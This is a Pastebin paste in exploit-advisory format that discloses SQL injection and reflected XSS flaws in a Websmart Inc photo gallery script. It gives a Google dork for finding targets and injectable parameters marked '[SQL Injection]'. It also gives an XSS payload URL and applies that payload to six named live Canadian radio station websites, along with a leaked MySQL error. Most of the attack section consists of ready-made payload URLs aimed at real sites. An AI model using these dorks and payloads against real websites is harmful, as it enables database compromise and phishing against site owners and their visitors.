Advertisement
KingSkrupellos

Websmart Inc Moose Jaw Area XSS SQL Injection

Jun 10th, 2019
71
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.09 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Websmart Inc Moose Jaw Area XSS SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 11/06/2019
  7. # Vendor Homepage : websmart.ca
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:Web Site by Websmart Inc site:ca
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. CWE-79 [ Improper Neutralization of Input During
  15. Web Page Generation ('Cross-site Scripting') ]
  16. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  17. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  18. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  19.  
  20. ###################################################################
  21.  
  22. # Impact :
  23. ***********
  24. WebSmart Canada is prone to an SQL-injection vulnerability because it fails to
  25. sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this
  26. issue could allow an attacker to compromise the application, access or modify data, or
  27. exploit latent vulnerabilities in the underlying database.
  28. A remote attacker can send a specially crafted request to the vulnerable application and
  29. execute arbitrary SQL commands in application`s database. Further exploitation of this
  30. vulnerability may result in unauthorized data manipulation.
  31. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  32.  
  33. Reflected XSS (or Non-Persistent) :
  34. ***************************************
  35. The server reads data directly from the HTTP request and reflects it back in the
  36. HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply
  37. dangerous content to a vulnerable web application, which is then reflected back to the victim
  38. and executed by the web browser. The most common mechanism for delivering malicious
  39. content is to include it as a parameter in a URL that is posted publicly or e-mailed directly
  40. to the victim. URLs constructed in this manner constitute the core of many phishing
  41. schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site.
  42. After the site reflects the attacker's content back to the victim, the content is executed by the victim's browser.
  43.  
  44. ###################################################################
  45.  
  46. # SQL Injection Exploit :
  47. **********************
  48. /photogallery_image_all.php?pageNum_rsimage=[ID-NUMBER]&totalRows_rsimage=[ID-NUMBER]&ImageCategory=[SQL Injection]
  49.  
  50. /photogallery_image_all.php?pageNum_rsimage=10&totalRows_rsimage=94&ImageCategory=91&ImageID=[SQL Injection]
  51.  
  52. # Cross Site Scripting XSS Exploit :
  53. ********************************
  54. /photogallery_image_all.php?pageNum_rsimage=10&
  55. totalRows_rsimage=94&ImageCategory=91&ImageID=1%27%3Cmarquee
  56. %3E%3Cfont%20color=lime%20size=32%3EXSS-Vulnerability-Found-By-
  57. KingSkrupellos%3C/font%3E%3C/marquee%3E
  58.  
  59. /photogallery_image_all.php?pageNum_rsimage=10&totalRows_rsimage=
  60. 94&ImageCategory=1%27<marquee><font%20color=lime%20size=32>
  61. XSS-Vulnerability-Found-By-KingSkrupellos</font></marquee>
  62.  
  63. ###################################################################
  64.  
  65. # Example Vulnerable Sites :
  66. *************************
  67. [+] bayshorebroadcasting.ca/photogallery_image_all.php?pageNum_rsimage=10&
  68. totalRows_rsimage=94&ImageCategory=91&ImageID=1%27
  69.  
  70. [+] bayshorebroadcasting.ca/photogallery_image_all.php?pageNum_rsimage=10&
  71. totalRows_rsimage=94&ImageCategory=91&ImageID=1%27%3Cmarquee
  72. %3E%3Cfont%20color=lime%20size=32%3EXSS-Vulnerability-Found-By-
  73. KingSkrupellos%3C/font%3E%3C/marquee%3E
  74.  
  75. [+] mix1065.ca/photogallery_image_all.php?pageNum_rsimage=10&totalRows_rsimage=
  76. 94&ImageCategory=91&ImageID=1%27%3Cmarquee%3E%3Cfont%20color=
  77. lime%20size=32%3EXSS-Vulnerability-Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E
  78.  
  79. [+] country1049.ca/photogallery_image_all.php?pageNum_rsimage=10&totalRows_rsimage=
  80. 94&ImageCategory=91&ImageID=1%27%3Cmarquee%3E%3Cfont%20color=
  81. lime%20size=32%3EXSS-Vulnerability-Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E
  82.  
  83. [+] country93.ca/photogallery_image_all.php?pageNum_rsimage=10&totalRows_rsimage=
  84. 94&ImageCategory=91&ImageID=1%27%3Cmarquee%3E%3Cfont%20color=
  85. lime%20size=32%3EXSS-Vulnerability-Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E
  86.  
  87. [+] 98thebeach.ca/photogallery_image_all.php?pageNum_rsimage=10&totalRows_rsimage=
  88. 94&ImageCategory=91&ImageID=1%27%3Cmarquee%3E%3Cfont%20color=
  89. lime%20size=32%3EXSS-Vulnerability-Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E
  90.  
  91. ###################################################################
  92.  
  93. # Example SQL Database Error :
  94. ****************************
  95. You have an error in your SQL syntax; check the manual that corresponds to
  96. your MySQL server version for the right syntax to use near '\'
  97. AND Images.Display ='1' LIMIT 10, 1' at line 1
  98.  
  99. ###################################################################
  100.  
  101. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  102.  
  103. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement